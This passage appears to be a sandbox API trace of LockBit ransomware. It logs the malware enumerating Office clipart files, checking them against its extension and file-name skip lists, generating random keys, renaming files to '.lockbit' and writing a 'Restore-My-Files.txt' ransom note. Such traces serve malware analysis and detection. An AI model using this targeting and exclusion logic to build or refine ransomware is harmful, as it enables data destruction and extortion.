hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0181.033] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0181.037] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.037] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.037] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.039] free (_Block=0x1fa2ed8) [0181.039] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.039] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.039] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fc5100, ftCreationTime.dwHighDateTime=0x1bd4e61, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3fc5100, ftLastWriteTime.dwHighDateTime=0x1bd4e61, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01770_.GIF", cAlternateFileName="")) returned 1 [0181.039] lstrcmpiW (lpString1=".", lpString2="WB01770_.GIF") returned -1 [0181.039] lstrcmpiW (lpString1="..", lpString2="WB01770_.GIF") returned -1 [0181.039] PathFindExtensionW (pszPath="WB01770_.GIF") returned=".GIF" [0181.039] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.039] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.039] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.039] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.039] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.040] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.040] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.041] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.041] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="ntldr", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01770_.GIF") returned -1 [0181.041] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01770_.GIF") returned -1 [0181.041] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.041] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF") returned=".GIF" [0181.042] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.042] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.042] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.043] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.043] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.043] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.043] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.043] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.043] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF.lockbit") returned 72 [0181.043] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01770_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0181.048] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.048] malloc (_Size=0x40068) returned 0x3f70048 [0181.048] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=772) returned 1 [0181.048] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0181.049] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0181.049] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0181.051] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.051] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.052] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.053] free (_Block=0x1fa2ed8) [0181.053] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.053] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.054] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa42a6f00, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa42a6f00, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01838_.GIF", cAlternateFileName="")) returned 1 [0181.054] lstrcmpiW (lpString1=".", lpString2="WB01838_.GIF") returned -1 [0181.054] lstrcmpiW (lpString1="..", lpString2="WB01838_.GIF") returned -1 [0181.054] PathFindExtensionW (pszPath="WB01838_.GIF") returned=".GIF" [0181.054] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.054] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.054] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.054] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.054] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.054] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.054] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.055] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.055] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.055] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.055] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.055] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.055] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.056] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="ntldr", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01838_.GIF") returned -1 [0181.056] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01838_.GIF") returned -1 [0181.056] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0181.056] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF") returned=".GIF" [0181.056] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0181.056] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0181.057] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0181.057] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0181.058] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0181.058] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0181.058] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0181.058] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0181.058] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF.lockbit") returned 72 [0181.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01838_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0181.059] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0181.059] malloc (_Size=0x40068) returned 0x3e70008 [0181.059] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3652) returned 1 [0181.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0181.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0181.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0181.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0181.061] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0181.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.065] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.065] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0181.067] free (_Block=0x1fa2ed8) [0181.067] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.067] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.068] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c81500, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1c81500, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x446, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01839_.GIF", cAlternateFileName="")) returned 1 [0181.068] lstrcmpiW (lpString1=".", lpString2="WB01839_.GIF") returned -1 [0181.068] lstrcmpiW (lpString1="..", lpString2="WB01839_.GIF") returned -1 [0181.068] PathFindExtensionW (pszPath="WB01839_.GIF") returned=".GIF" [0181.068] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.068] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.068] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.069] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0181.069] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0181.069] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0181.069] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0181.069] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0181.069] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0181.070] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0181.070] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="ntldr", lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01839_.GIF") returned -1 [0181.070] lstrcmpiW (lpString1="autorun.inf", 